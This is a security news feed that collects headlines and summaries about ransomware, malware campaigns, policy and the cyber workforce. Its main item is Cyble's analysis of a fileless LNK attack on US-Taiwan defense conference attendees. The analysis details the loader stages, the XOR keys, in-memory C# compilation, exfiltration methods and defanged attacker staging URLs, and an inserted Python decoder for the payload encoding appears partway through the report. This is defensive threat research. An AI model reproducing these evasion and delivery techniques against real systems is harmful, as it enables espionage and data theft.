We do not want to regress any clients’ post-quantum security, so we are waiting until Chrome 131 to make this change so that server operators have a chance to update their implementations. Longer term, we hope to avoid the chicken-and-egg problem for post-quantum key share predictions through our emerging IETF draft for key share prediction. This allows servers to broadcast what algorithms they support in DNS, so that clients can predict a key share that a server is known to support. This avoids the risk of an extra round trip, which can be particularly costly when using large post-quantum algorithms. We’re excited to continue to improve security for Chrome users, against both current and future computers.

Notes
[1] Chrome Canary, Dev, and Beta may see these changes prior to Chrome 131.

by Google Security Blog

Kawasaki Motors Europe has announced that it's recovering from a cyberattack that caused service disruptions as the RansomHub ransomware gang threatens to leak stolen data. [...]

by BleepingComputer

India has claimed a spot in the Tier-1 category in the latest Global Cybersecurity Index (GCI) 2024, released by the International Telecommunication Union (ITU). With a rank of 98.49, India is one of the 47 countries that has been adjudged as a leading nation which has demonstrated commitment to robust cybersecurity practices. The GCI conducts a comprehensive assessment of national cybersecurity preparedness annually. It evaluates countries across five key pillars: legal, technical, organizational, capacity development, and cooperation. In its fifth annual report, the GCI found India taking strong actionable cybersecurity measures in all these crucial areas.

Legal Measures Boost India's Rank in Global Cybersecurity Index

According to the GCI 2024 report, India excelled in the legal pillar, establishing a robust framework of laws and regulations to govern cybersecurity. The Information Technology Act (2000) and its amendments hold significant weight in this regard, outlining measures to combat cybercrime, protect critical infrastructure, and ensure data privacy. Additionally, the passage of the Digital Personal Data Protection Bill (2022) further strengthens India's legal framework, providing enhanced safeguards for citizen data.

[Figure: Source: GCI 2024]

Technical Prowess and Capacity Building

India's technical prowess also contributed to its Tier 1 placement. The country has witnessed a surge in initiatives promoting secure infrastructure and technology adoption. This includes the establishment of the Indian Computer Emergency Response Team (CERT-In), a national body dedicated to cyber incident response and threat mitigation. Additionally, various government programs promote capacity building through training and awareness initiatives across diverse sectors. The GCI report underscores the importance of international cooperation in the fight against cybercrime. India has actively participated in global efforts, fostering collaboration with international organizations and other nation-states. This includes participation in forums like the Budapest Convention on Cybercrime and joint cybersecurity exercises with partner countries.

Ranking of Other Countries, Challenges

As many as 47 countries out of 194 made it to the Tier 1 of the GCI report. Among the countries in the category, 12 received a perfect score of 100, including Korea, the U.K., Denmark, Italy, Finland and the United Arab Emirates.

[Figure: Source: GCI 2024]

Worrisome threats highlighted in the report included ransomware attacks targeting government services and other sectors, cyber breaches affecting core industries, costly system outages, and breaches of privacy for individuals and organizations. “Building trust in the digital world is paramount,” said Doreen Bogdan-Martin, ITU Secretary-General. “The progress seen in the Global Cybersecurity Index is a sign that we must continue to focus efforts to ensure that everyone, everywhere can safely and securely manage cyberthreats in today's increasingly complex digital landscape.” Most countries are either “establishing” (Tier 3) or “evolving” (Tier 4) in terms of cybersecurity. The 105 countries in these tiers have largely expanded digital services and connectivity but still need to integrate cybersecurity measures. A “cyber capacity gap” – characterized by limitations in skills, staffing, equipment and funding – was evident in many countries and across all regional groups, according to the report. Legal measures are the strongest cybersecurity pillar for most countries: 177 countries have at least one regulation on either personal data protection, privacy protection, or breach notification in force or in progress, it added.

Challenges Remain

While India's ascension to Tier 1 is a cause for celebration, challenges still remain. The ever-evolving cyber threat landscape demands continuous vigilance and adaptation. Bridging the digital divide and ensuring equitable access to cybersecurity resources across all segments of society is crucial. Additionally, fostering a culture of cyber hygiene and raising public awareness about online threats remain key priorities. India's placement in Tier 1 presents an opportunity to build upon its achievements. Continuous improvement in legal frameworks, investment in cutting-edge technology, and fostering a collaborative environment both within and across borders will be critical for maintaining its leadership position. By prioritizing cybersecurity, India can pave the way for a more secure and resilient digital future for its citizens and businesses.

by The Cyber Express

The recently observed Hadooken malware targeting Oracle WebLogic applications is linked to multiple ransomware families. The post New ‘Hadooken’ Linux Malware Targets WebLogic Servers appeared first on SecurityWeek.

by SecurityWeek

Cybersecurity researchers have uncovered a new malware campaign targeting Linux environments to conduct illicit cryptocurrency mining and deliver botnet malware. The activity, which specifically singles out the Oracle Weblogic server, is designed to deliver a malware strain dubbed Hadooken, according to cloud security firm Aqua. "When Hadooken is executed, it drops a Tsunami malware and deploys

by The Hacker News

A joint report from the Committees on China and Homeland Security warns of the security risks posed by Chinese cranes in US ports. The post House Report Shows Chinese Cranes a Security Risk to US Ports appeared first on SecurityWeek.

by SecurityWeek

In this blog, we delve into the top three concealed security expenses associated with low-code mobile app development and explore strategies to mitigate them. The post Unlocking the Hidden Costs of Mobile App Security in Low-Code Development appeared first on Zimperium.

by Zimperium

The designation of UK data centers as Critical National Infrastructure strengthens cyber defenses, but a proposed £3.75B data center on protected Green Belt land sparks debate. The post UK Data Centers Gain Critical Infrastructure Status, Raising Green Belt Controversy appeared first on SecurityWeek.

by SecurityWeek

Cyble Research and Intelligence Labs (CRIL) has recently uncovered a sophisticated cyber campaign aimed at attendees of the upcoming US-Taiwan Defense Industry Conference. This stealthy fileless attack utilizes a malicious file to carry out an in-memory attack, evading traditional detection methods while exfiltrating sensitive data from targeted systems. The fileless campaign detected by CRIL involves a malicious ZIP archive disguised as a legitimate registration form for the conference. This deceptive tactic is designed to trick users into executing a harmful LNK file that appears to be a PDF document. When executed, the LNK file initiates a series of covert actions to establish persistence and execute further malicious activities.

Overview of the Stealthy Fileless Attack Campaign

[Figure: Infection Chain (Source: Cyble)]

Upon execution of the LNK file, it extracts a lure PDF and a base64-encoded executable. This executable, protected by the .NET Confuser tool, is placed in the startup folder to ensure it runs every time the system reboots. Once the executable is activated, it downloads additional malicious content, including an encrypted DLL file from a remote server. This DLL is then decrypted and loaded directly into memory, avoiding detection by conventional security tools. The campaign’s stealthiness is further enhanced by the second-stage loader, which dynamically compiles and executes C# code entirely in memory. This technique, known as in-memory execution, prevents the creation of traceable files on disk, making detection significantly more challenging.

Technical Analysis

CRIL's investigation revealed that the initial infection vector remains unclear, though the lure document suggests that spam emails might be used to distribute the malicious archive. The ZIP file, named "registration_form.pdf.zip," contains an LNK file with a dual extension (.pdf.lnk), misleading users into believing it is a harmless PDF document.

[Figure: Contents of registration_form.pdf.lnk (Source: Cyble)]

When the LNK file is opened, it executes a series of commands in the background. It decodes embedded base64 content, saving the lure PDF and executable to the system. The executable is then placed in the startup folder to ensure persistence. Following this, the lure PDF is opened with the system’s default PDF viewer. The first-stage loader, "updater.exe," is designed to run from the startup directory. It sends a POST request to a compromised site, revealing the victim's machine information. The loader then retrieves additional content from a URL controlled by the attackers, including a base64-encoded and XOR-encrypted DLL file. This DLL file is dynamically loaded and executed in memory using .NET's “Assembly.Load” function. The second-stage loader follows a similar process, downloading encrypted C# code, which is compiled and executed entirely in memory. This approach effectively evades detection by traditional security measures.

Data Exfiltration and Network Communication

Once the compiled code is executed, it initiates the exfiltration of sensitive data. The data is sent to the attacker's server using web requests that mimic normal traffic, further complicating detection efforts. The "WebClient" object is employed to upload data in a format that resembles standard web form submissions, with the "ContentType" set to "application/x-www-form-urlencoded" and the "UserAgent" header altered to simulate a web browser. The attackers also leverage a compromised website to host and manage malicious content. This includes storing exfiltrated data and additional payloads on an exposed open directory. CKFinder, a PHP-based file management framework, is used to facilitate the upload and management of these files. The sophisticated nature of this fileless attack and its timing suggest that it is likely conducted by threat actors with geopolitical interests. Historically, Chinese threat actors have targeted Taiwan around significant political events, as evidenced by increased cyberattacks during Taiwan’s recent presidential election. While this pattern aligns with the current attack's context, the specific threat actor behind this campaign has not been identified. No direct links have been established to known advanced persistent threat (APT) groups or other threat actors.

Conclusion

This fileless attack exemplifies a high level of sophistication in both its execution and evasion techniques. By disguising the initial payload as a legitimate conference registration document and employing advanced in-memory execution methods, the attackers can steal sensitive information without leaving traditional traces on the disk. The timing of the attack, coinciding with the US-Taiwan Defense Industry Conference, underscores its potential intent to target valuable defense-related information. As the campaign progresses, vigilance and advanced detection strategies will be crucial in defending against such stealthy fileless attacks.

by The Cyber Express

This reference guide explains key roles across the IT industry, helping current and aspiring IT professionals choose the right career path and understand their next steps.

by ITPro Today

Password management organisation Keeper Security has unveiled the addition of a passphrase generator to the Keeper platform for mobile. This new feature, now available on Android devices, is designed to help users create strong and unique credentials for their accounts, addressing the growing risks posed by sophisticated cyber threats. Passphrases on iOS will be available […] The post Keeper Security Expands Passphrase Generator Capability to Mobile Devices appeared first on IT Security Guru.

by IT Security Guru

International Cyber Expo is once again teaming up with CrisisCast, to deliver their renowned immersive demonstrator experience, alongside exhibitors at this year’s highly anticipated event. Held at Olympia London on the 24th and 25th of September 2024, the Expo will showcase cutting-edge solutions and thought leadership in cybersecurity. CrisisCast, known for simulating crisis environments to address emerging […] The post Real-Time Cyberattack Simulations Take Centre Stage at International Cyber Expo 2024 with CrisisCast appeared first on IT Security Guru.

by IT Security Guru

Following a summit with U.S. and European partners, the company is working to build additional resiliency features to prevent a repeat of the historic global IT outage linked to CrowdStrike.

by Cybersecurity Dive

A 17-year-old from England has been arrested by the NCA over the recent cyberattack on Transport for London. The post UK Teen Arrested Over Transport for London Hack appeared first on SecurityWeek.

by SecurityWeek

As AI/ML applications surge, companies must prioritize GPU cost monitoring and optimization strategies to prevent spiraling costs and inefficiencies.

by ITPro Today

Researchers uncovered an Android malware, dubbed Vo1d, that has already infected nearly 1.3 million Android devices in 197 countries. Doctor Web researchers uncovered a malware, tracked as Vo1d, that infected nearly 1.3 million Android-based TV boxes belonging to users in 197 countries. The malicious code acts as a backdoor and allows attackers to download and install […]

by Security Affairs

Doctor Web warns of the new Vo1d Android malware infecting roughly 1.3 million TV boxes running older OS versions. The post 1.3 Million Android TV Boxes Infected by Vo1d Malware appeared first on SecurityWeek.

by SecurityWeek

By focusing directly on skills instead of more subjective criteria, IT leaders can build highly capable teams. Here's what you need to know to get started.

by ITPro Today

Aside from enabling the monitoring of hacking operations, Recorded Future's threat intelligence platform has also been touted to facilitate the discovery of misconfigured and vulnerable systems, as well as at-risk third-party infrastructure.

by SC Media

Nearly $5 billion of the reported losses — which also stemmed from call center fraud, tech support scams, and government spoofing — were attributed to the U.S., with California, Texas, Florida, and New York having the highest damages across the country, a report from the FBI's Internet Crime Complaint Center showed.

by SC Media

Details regarding the targets of the indictment were not provided but such a move comes as the Justice Department committed to bolster transparency about election-targeted foreign influence threats after being less open about Russian interference during the 2016 polls.

by SC Media

Infiltration of TfL's internal systems on September 1 resulted in the exfiltration of some customers' names and contact information, as well as refund data belonging to nearly 5,000 Oyster cardholders.

by SC Media

Rain Technology announced ATM Switchable Privacy, designed to protect consumers against visual hackers and snoopers at ATM terminals in financial institutions, retail stores, restaurants, airports, and other public settings. ATM stats and state of the market: With more than three million ATMs around the world and a global ATM market size estimated to reach $28 billion by 2026, ATMs within retail and banking settings represent a significant risk point for merchants, retailers and banks as … The post Rain Technology protects consumers against visual hackers and snoopers at ATM terminals appeared first on Help Net Security.

by Help Net Security

Attacks with the novel Veaty and Spearal malware strains have been deployed by Iranian state-backed advanced persistent threat operation OilRig, also known as APT34, against Iraqi government agencies and organizations as part of a new cyberespionage campaign.

by SC Media

Threat actors part of the proxyjacking campaign exploited Selenium Grid servers' "goog:chromeOptions" configuration to facilitate deployment of a base64-encoded Python script, which enabled the retrieval of an open-source GSocket reverse shell.

by SC Media

Atlassian's 2024 State of IT Incident Management Report sees progress in some areas, including organizations becoming more proactive, though evergreen challenges remain.

by ITPro Today

GitLab has released security updates to resolve multiple vulnerabilities in GitLab CE/EE, including a critical-severity pipeline execution flaw. The post GitLab Updates Resolve Critical Pipeline Execution Vulnerability appeared first on SecurityWeek.

by SecurityWeek

Critical infrastructure operators must beware of Russian military hacking groups. Plus, cyber scammers are having a field day with crypto fraud. Meanwhile, AI and cloud vendors face stricter reporting regulations in the U.S. And get the latest on AI-model risk management and on cybersecurity understaffing! Dive into six things that are top of mind for the week ending September 13.

1 - Critical infrastructure orgs targeted by Russia-backed hackers

Here’s an important warning for critical infrastructure organizations in the U.S. and abroad: Nation-state hacking groups affiliated with Russia’s military are attacking critical infrastructure targets to conduct espionage, carry out sabotage and inflict reputational harm.

That’s according to a joint advisory from the governments of the U.S. and nine other countries that details the groups’ tactics, techniques and procedures, lists indicators of compromise and offers mitigation recommendations.

The groups are affiliated with the Russian armed forces’ Unit 29155, according to the advisory “Russian Military Cyber Actors Target US and Global Critical Infrastructure” published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA).

These Unit 29155 groups have been operating since 2020. They’re currently focused on disrupting aid efforts to Ukraine, which they first attacked with the WhisperGate malware in early 2022. They also target critical infrastructure organizations in North Atlantic Treaty Organization (NATO) countries.

Their attacks include defacing websites, stealing and leaking data, and scanning infrastructure. To gain initial access, these hacking groups use VPNs to hide their actions and then target internet-facing systems’ weaknesses, including these vulnerabilities:

- CVE-2021-33044
- CVE-2021-33045
- CVE-2022-26134
- CVE-2022-26138
- CVE-2022-3236

Immediate steps that critical infrastructure organizations should take to protect themselves include:

- Make it a priority to routinely update systems and to remediate known vulnerabilities exploited in the wild.
- Segment networks.
- Adopt phishing-resistant multi-factor authentication for all externally-facing account services.

To get more details, read:

- The CISA alert
- The full advisory “Russian Military Cyber Actors Target US and Global Critical Infrastructure”

To learn more about securing operational technology (OT) systems in critical infrastructure environments, check out these Tenable resources:

- “CISA Finding: 90% of Initial Access to Critical Infrastructure Is Gained Via Identity Compromise. What Can You Do About It?” (blog)
- “OT Security Master Class: Understanding the Key Principles, Challenges, and Solutions” (on-demand webinar)
- “Operational Technology (OT) Security: How to Reduce Cyber Risk When IT and OT Converge” (guide)
- “5 Key OT Security Use Cases For The DoD: Safeguarding OT Networks and Cyber-Physical Systems” (white paper)
- “Unlock Advanced IoT Visibility in your OT Environment Security” (on-demand webinar)

2 - Cyber crooks double down on crypto scams

Decentralized. Distributed. Speedy. Ephemeral. Irreversible.

These are some of the key characteristics of cryptocurrency transactions that make them irresistibly attractive to cybercriminals, as evidenced by a strong increase in both the number of crypto scams and total losses in 2023.

These findings come from the “2023 IC3 Cryptocurrency Report,” released this week by the FBI’s Internet Crime Complaint Center (IC3). Specifically, the IC3 received almost 69,500 crypto-related complaints last year. Losses amounted to $5.6 billion, a 45% increase over 2022.

[Figure: Source: “2023 IC3 Cryptocurrency Report” from the FBI’s Internet Crime Complaint Center, September 2024]

Other report takeaways include:

- Most of the losses – 70% – came from investment scams.
- Crypto scams accounted for about 10% of all financial-fraud complaints, but they disproportionately generated almost 50% of total losses.
- While most of the complaints fielded by IC3 originated in the U.S., it received complaints from victims in 200-plus countries.

The report unpacks multiple types of crypto investment-fraud schemes, detailing scammers’ tactics and offering detailed prevention tips.

For more information about crypto fraud:

- “What To Know About Cryptocurrency and Scams” (U.S. Federal Trade Commission)
- “How To Recover Funds From Crypto and Bitcoin Scam” (Blockchain Council)
- “Cryptocurrency Scams: How to Spot, Report, and Avoid Them” (Investopedia)
- “Cryptocurrency scams: Common types and prevention” (TechTarget)

Video: How Americans Are Losing Their Life Savings To Crypto Fraud (CNBC)

3 - Uncle Sam wants more info from AI and cloud vendors

The AI regulatory landscape continues to expand. This week, developers of AI systems and providers of cloud services learned they may soon have to submit more detailed reports about their wares to the U.S. government.

Specifically, the U.S. Department of Commerce has proposed new rules for mandatory and detailed reporting about AI models and cloud computing clusters, due to concerns about hackers abusing powerful AI and cloud systems.

AI developers and cloud providers would have to submit information to the U.S. government about their development activities and about cybersecurity measures and testing.

“This proposed rule would help us keep pace with new developments in AI technology to bolster our national defense and safeguard our national security,” Secretary of Commerce Gina M. Raimondo said in a statement.

To get more information about trends in AI security and regulation:

- “AI governance trends: How regulation, collaboration and skills demand are shaping the industry” (World Economic Forum)
- “Artificial Intelligence Index Report 2024: Policy and Governance” (Stanford University)
- “Legalweek 2024: Current US AI regulation means adopting a strategic – and communicative – approach” (Thomson Reuters)
- “AI regulation: What businesses need to know in 2024” (TechTarget)

4 - New risk management framework for AI and ML models

Concerned about the pitfalls faced by developers and users of AI and machine learning (ML) models? You might want to check out the Cloud Security Alliance’s paper “AI Model Risk Management Framework.”

The 54-page document addresses common AI model risks, including:

- Data quality issues
- Flawed model selection, tuning and design
- Implementation and operational mistakes

The CSA framework offers a “structured approach” to identify, assess, mitigate and monitor AI model risks. Its four pillars are:

- Model cards, which detail model elements such as its purpose, training, capabilities, resistance to attacks, limitations and performance
- Data sheets, which offer descriptions of the dataset used to create an AI model
- Risk cards, which summarize an AI model’s key risks
- Scenario planning, which outlines ways in which a model could malfunction or be abused

[Figure: Framework Pillars for Responsible and Well-Informed Use of AI / ML (Source: Cloud Security Alliance’s “AI Model Risk Management Framework,” July 2024)]

“A comprehensive framework goes a long way to ensuring responsible development and enabling the safe and responsible use of beneficial AI/ML models, which in turn allows enterprises to keep pace with AI innovation,” Caleb Sima, Chair of the CSA AI Safety Initiative, said in a statement.

The paper’s intended audience includes AI and ML engineers and developers; data scientists; risk managers; compliance pros; and business executives.

According to the paper, the benefits of adopting a risk management framework for AI and ML models include more transparency, proactive risk mitigation and enhanced decision-making processes.

5 - U.S. gov’t tackles cyber understaffing with new campaign

Is your organization struggling to recruit cybersecurity pros? A new initiative from the U.S. government aims to connect potential candidates with employers.

With about 500,000 cybersecurity jobs vacant in the U.S., the White House has launched a two-month “sprint” campaign designed to help recruit candidates to fill these positions.

Called “Service for America,” the campaign kicked off in early September and runs through the end of October. Its goal: to boost the country’s cyber workforce via a variety of initiatives, such as job fairs.

“These jobs offer an opportunity to serve our country by protecting our national security, while also offering a personal path to prosperity,” National Cyber Director Harry Coker, Jr. wrote in the blog post “Service for America: Cyber Is Serving Your Country.”

“Service for America” will aim to create awareness that people don’t need a technical degree or background to qualify for cybersecurity jobs. “Cyber professionals are part of a dynamic and diverse modern workforce and individuals from all backgrounds and disciplines have a place,” Coker, Jr. wrote.

“Service for America” is part of the “National Cyber Workforce and Education Strategy,” unveiled in mid-2023, which seeks, among other things, to:

- Remove degree requirements from cybersecurity jobs, shifting instead to a skills-based approach
- Expand apprenticeships that allow people to gain cybersecurity skills while at their current jobs
- Encourage employers, academia, local governments and non-profit organizations to offer cybersecurity training and education in their local communities

The Office of the National Cyber Director is spearheading the “Service for America” campaign, in partnership with the Office of Management and Budget and the Office of Personnel Management.

To get more details, check out:

- The “Service for America” home page
- The blog post “Service for America: Cyber Is Serving Your Country”
- This video from the National Cyber Director

For more information about how organizations can improve recruitment of cyber pros:

- “Recruitment and Retention in Cybersecurity” (ISC2)
- “Strategic Cybersecurity Talent Framework” (World Economic Forum)
- “Growing threats outpace cybersecurity workforce” (Thomson Reuters)
- “Why closing the cyber skills gap requires a collaborative approach” (World Economic Forum)
- “Cybersecurity skills gap: Why it exists and how to address it” (TechTarget)

6 - Report: Almost 5M cyber jobs open globally

And continuing with the topic of cybersecurity understaffing, the problem isn’t getting any better globally either.

There are 4.8 million vacant cybersecurity jobs worldwide, up 19% compared with 2023, with the primary causes being budget constraints and lack of qualified candidates, according to the “2024 ISC2 Cybersecurity Workforce Study.”

The number of cyber pros employed globally – 5.5 million – stayed flat from last year. Meanwhile, the world needs 10.2 million cyber pros to satisfy the workforce demand.

“At a time when organizations can least afford the cost, disruption and reputational damage of a cybersecurity incident, the profession is under its greatest pressure to maintain safety and security with fewer resources,” reads an ISC2 statement.

ISC2 plans to publish the report in October, but released key stats this week.

Another number that stayed flat compared with 2023 was the percentage of respondents that reported having a shortage of cyber pros – 67%.

In addition to understaffing, organizations are also experiencing skills gaps. Specifically, 90% reported having technical skills gaps in their cybersecurity teams, with AI / ML skills the most commonly reported at 34%. Rounding out the top five cybersecurity tech-skills gaps were:

- Cloud computing security (30%)
- Zero Trust implementation (27%)
- Digital forensics and incident response (25%)
- A tie between application security and penetration testing, both at 24%

Meanwhile, 74% of respondents described the current threat landscape as the most challenging they’ve encountered in the last five years.

The study is based on a worldwide survey of almost 16,000 cybersecurity practitioners and decision-makers.

If you’d like to explore career opportunities at Tenable, visit us at https://www.tenable.com/careers

by Tenable

Key Takeaways

- Cyble Research and Intelligence Labs (CRIL) identified a campaign targeting individuals connected to the upcoming US-Taiwan Defense Industry Conference, as indicated by the lure document uncovered during the investigation.
- The campaign involves a ZIP archive containing an LNK file that mimics a legitimate PDF registration form for deception.
- When the LNK file is opened, it executes commands to drop a lure PDF and an executable in the Startup folder, establishing persistence.
- Upon system reboot, the executable downloads additional content and executes it directly in memory, effectively evading detection by security products.
- The first-stage loader triggers a second-stage loader, which downloads, decodes, and compiles C# code in memory, avoiding the creation of traceable files on disk.
- Once the compiled code is executed, the malware exfiltrates sensitive data back to the attacker's server via web requests designed to blend in with normal traffic, making detection more difficult.

Overview

The initial infection vector of this campaign remains unclear; however, based on the lure document analyzed, there are indications that the attack may have been delivered to users via spam emails.

The attack commences with a suspicious archive file containing an LNK file disguised as a PDF document. This deception is designed to trick users into executing the malicious LNK file, which in turn triggers a series of covert actions in the background. Upon execution, the LNK file extracts two components: a base64-encoded executable and the actual lure PDF. The executable is protected using .NET's Confuser, an obfuscation tool, to evade detection and is placed in the Startup folder to ensure persistence on the compromised system.

Once the executable runs, it retrieves additional malicious content, specifically a DLL file, from a remote server. This DLL file is encrypted using an XOR operation to further obscure its purpose. The executable employs .NET's "Assembly.Load" function to load the decrypted DLL directly into memory, enabling it to bypass traditional security mechanisms that scan files written to disk. After the DLL is loaded, it downloads encrypted C# code from the TA-controlled server, compiles it on the victim's machine, and then executes it entirely in memory.

During our testing of this malware, we were unable to capture the final payload. However, analysis of the loader's code suggests that the payload's ultimate purpose is to exfiltrate sensitive data from the victim's machine to conduct further malicious activities. Based on the lure document used in this attack, it is likely that the TA behind this campaign is specifically targeting individuals associated with the upcoming US-Taiwan Defense Industry Conference.

The figure below shows the infection chain.

Figure 1 - Infection chain

Technical Analysis

CRIL uncovered a campaign targeting users by posing as registration forms for the upcoming conference and distributing malicious ZIP files under the name "registration_form.pdf.zip". The ZIP file contains an LNK file disguised as a PDF. When extracted, the archive presents a file named "registration_form.pdf," but this is actually an LNK file with a dual extension (.pdf.lnk), misleading the user into thinking it is a legitimate PDF document.

The malicious LNK file contains an embedded executable and a lure PDF, both encoded in base64 format, further concealing the malicious content, as shown in Figure 2. When the user opens the LNK file, it triggers several background commands. First, the LNK file locates the embedded base64 content using the "findstr" command and saves the two blobs as "1.txt" and "2.txt," respectively. Next, the "certutil" utility decodes these files, storing the lure PDF as "registration_form.pdf" in the Temp directory and the executable as "update.exe" in the "%AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" folder, ensuring persistence. Finally, registration_form.pdf is opened with the system's default PDF viewer.

The figure below shows the content of the malicious LNK file.

Figure 2 - Contents of registration_form.pdf.lnk

Lure Document:

The lure document used in this attack suggests that the TA behind the campaign is likely targeting individuals connected to the upcoming US-Taiwan Defense Industry Conference, which is scheduled to take place in the United States from September 22nd to September 24th, 2024. The potential targets are expected to include key participants such as defense officials, industry executives, government representatives, and other stakeholders involved in or attending the event. The timing and focus of the campaign suggest that the TA aims to exploit the significance of the conference, potentially for gathering sensitive information to conduct further malicious activities. This strategic targeting underscores the sophisticated nature of the campaign and its alignment with geopolitical interests.

The figure below shows the lure document.

Figure 3 - Contents of the lure document

First Stage Loader: updater.exe

The "Updater.exe" file functions as a loader and is protected using the .NET "Confuser protector." It is placed in the Startup folder, ensuring it executes each time the user logs into the system. Upon execution, the file first verifies whether it is running from the "Startup" directory. If it is, execution proceeds; otherwise, it terminates without further action.

When the file runs, it sends a POST request to a compromised site controlled by the TA, transmitting the victim's machine name (observed as "MSEDGEWIN10" in the analysis environment). Next, using "WebClient", it downloads string content from "hxxp://tdea.com.tw/asset/uploads/files/68679813[.]txt" and removes the first character to retrieve the correct base64-encoded content. This reveals the URL for the 2nd-stage loader: "hxxp://tdea.com.tw/asset/uploads/files/68679815[.]txt".

The first-stage loader downloads a base64-encoded data stream from the above URL, which is first decoded and then further processed by applying an XOR operation using a hardcoded key with a decimal value of 16. This operation results in the extraction of a DLL file. The figure below shows the decryption loop used to recover the DLL file.

Figure 4 – Decryption Loop

The extracted DLL is then dynamically loaded and executed using the .NET "Assembly.Load" function, allowing the TA to invoke malicious functionality embedded within the DLL. The figure below shows how the "Assembly.Load" function is used to load the decrypted DLL and call a specific method named "MyEntry" within a class named "ConsoleApp.MyClass".

Figure 5 - 1st stage loader

Second Stage Loader

The .NET "Assembly.Load" function is used to load the second-stage loader, which functions similarly to the initial stage. This DLL loader retrieves additional base64-encoded content from the TA-controlled server. Once the content is downloaded, it is decoded using base64 and then processed with an XOR operation using a hardcoded key of 48 in decimal, as shown below.

Figure 6 - Decryption loop

Although the URL "hxxp://tdea.com.tw/asset/uploads/files/68679811[.]txt" currently doesn't contain any data, code analysis indicates that the decoded content is likely XML data containing C# code and assembly references (DLLs), which uses the "Compile After Delivery" technique to compile the source code at runtime.
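Both loader stages use the same transformation: fetch a text file, drop its first character, base64-decode the rest, and XOR every byte with a single hardcoded key (16 for the DLL stage, 48 for the C# stage). The helper below is an added analysis example for incident responders working on a captured stage file; it is not Cyble's code and not the loader's code. The key-search function and the fixture builder are additions of mine, and the sample inputs are constructed stand-ins, not bytes from the real payloads.

```python
"""
Added analysis helper, not code from Cyble or from the campaign. It reverses
the encoding the write-up describes for both loader stages: the loader fetches
a text file, discards its first character, base64-decodes the remainder and
XORs every byte with a single hardcoded key (16 for the DLL stage, 48 for the
C# stage). The fixtures below are constructed; no bytes from the real payloads
are used.
"""
import base64

# XOR keys reported in the analysis, by stage.
STAGE_KEYS = {"dll": 16, "csharp": 48}


def decode_stage(text: str, key: int, skip_first_char: bool = True) -> bytes:
    """Drop the leading junk character, base64-decode, then XOR with `key`."""
    payload = text[1:] if skip_first_char else text
    raw = base64.b64decode(payload, validate=True)  # raises on corrupt input
    return bytes(b ^ key for b in raw)


def looks_like_pe(data: bytes) -> bool:
    """A recovered DLL/EXE starts with the 'MZ' DOS header."""
    return data[:2] == b"MZ"


def looks_like_xml(data: bytes) -> bool:
    """The C# stage is expected to arrive as XML wrapping source and references."""
    stripped = data.lstrip()
    return stripped.startswith(b"<") and b"</" in stripped


def brute_force_key(text: str):
    """Single-byte XOR is cheap to search; return (key, kind) or None.

    Useful when a new sample uses a key other than the two reported ones
    (this search is my addition, not something the loader does).
    """
    for key in range(256):
        try:
            candidate = decode_stage(text, key)
        except ValueError:  # binascii.Error: not base64 at all
            return None
        if looks_like_pe(candidate):
            return key, "pe"
        if looks_like_xml(candidate):
            return key, "xml"
    return None


def make_fixture(plaintext: bytes, key: int, lead: str = "#") -> str:
    """Constructed input in the loader's format (XOR is its own inverse)."""
    xored = bytes(b ^ key for b in plaintext)
    return lead + base64.b64encode(xored).decode("ascii")


# Constructed stand-ins for the two stages (clearly not real payloads).
FAKE_DLL = b"MZ\x90\x00constructed-not-a-real-dll"
FAKE_XML = b"<payload><code>// constructed</code></payload>"


if __name__ == "__main__":
    blob = make_fixture(FAKE_DLL, STAGE_KEYS["dll"])
    print("stage1 is PE:", looks_like_pe(decode_stage(blob, STAGE_KEYS["dll"])))
    print("recovered key:", brute_force_key(blob))
```

Run it against the text downloaded from the stage URLs (with the first character still present) and check the recovered bytes for the MZ header or an XML root before handing them to further analysis; the key search only covers the one-byte XOR reported here, so a sample that changes the scheme will return None rather than a false positive.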
Figure 7 - Code snippet downloading XML data

In-memory Execution

The downloaded C# code is compiled in memory using specific compiler parameters such as "GenerateExecutable = false" and "GenerateInMemory = true". These parameters are passed along with references to core assemblies such as "System.dll", "System.Data.dll", and "System.Management.dll". "System.Management.dll" is specifically used to interact with Windows Management Instrumentation (WMI), allowing the code to query system properties and interact with system components through WMI queries. This suggests that the TA may use WMI queries to gather system information from the victim. Additional DLLs may also be included as reference assemblies.

The compiled code is executed directly in memory, bypassing the disk entirely, which complicates detection by conventional security tools. This method is highly effective for evasion. It allows malware or APT groups to dynamically generate and execute payloads at runtime, making detection and mitigation efforts significantly more challenging for defenders. The figure below shows a code snippet responsible for compiling the downloaded C# code and executing it in memory.

Figure 8 - Compiling the C# code and executing it in memory

Data Exfiltration

After executing the compiled code, the resulting data is sent back to the TA's server using a web request. A "WebClient" object is used to upload the data, where the request's "ContentType" is set to "application/x-www-form-urlencoded" to simulate standard form data submission, and the "UserAgent" header is modified to mimic a web browser. The "UploadString" method is used to send a POST request to the TA's specified URL, along with parameters such as a randomly generated filename, a command flag, and the encoded content being transmitted.

Figure 9 – UploadString method to POST data

Network Communication:

The TA leverages a compromised website to host malicious content and frequently retrieves files stored within an exposed open directory. Moreover, the TA employs CKFinder, a PHP-based file management framework, to upload and manage files sent from the victim machines. This framework allows the TA to store exfiltrated data or additional malicious payloads on the server. The image below illustrates the structure of the open directory on the compromised site, highlighting the ease with which the TA can access and manipulate stored files.

Figure 10 - Open Directory

Threat Attribution

Chinese threat actors have a well-documented history of targeting Taiwan, particularly around significant political events. For instance, during the period leading up to Taiwan's presidential election earlier in 2024, there was a marked increase in cyberattacks within the 24 hours preceding the election, as reported by Trellix. Despite this pattern, the specific TA behind the current campaign remains unidentified, and we have not been able to link these tactics, techniques, and procedures (TTPs) to any known threat actor or advanced persistent threat (APT) group at this time.

Conclusion

This sophisticated attack employs social engineering and advanced in-memory execution techniques to avoid detection. By disguising the LNK file as a legitimate conference registration PDF and executing payloads dynamically in memory, the TAs can conduct malicious activities to steal sensitive information without leaving traces on the disk. Given the timing and context of the US-Taiwan Defense Industry Conference, this campaign is likely intended to conduct malicious operations targeting valuable information related to defense collaborations.

Our Recommendations

- Deploy advanced email filtering solutions to block phishing emails and suspicious attachments before they reach the end users. Anti-phishing solutions that use machine learning or behavior analysis can also identify and block malicious campaigns at an early stage.
- Implement security solutions with advanced threat detection that can monitor in-memory execution of code or PowerShell commands. Tools like EDR (Endpoint Detection and Response) should be used to detect unusual behavior, such as programs compiling and running C# code in memory.
- Ensure that users have the least privileges required for their roles, reducing the risk of malware being able to execute in privileged areas. Application whitelisting or blocking untrusted applications from executing in certain directories can also minimize the risk.
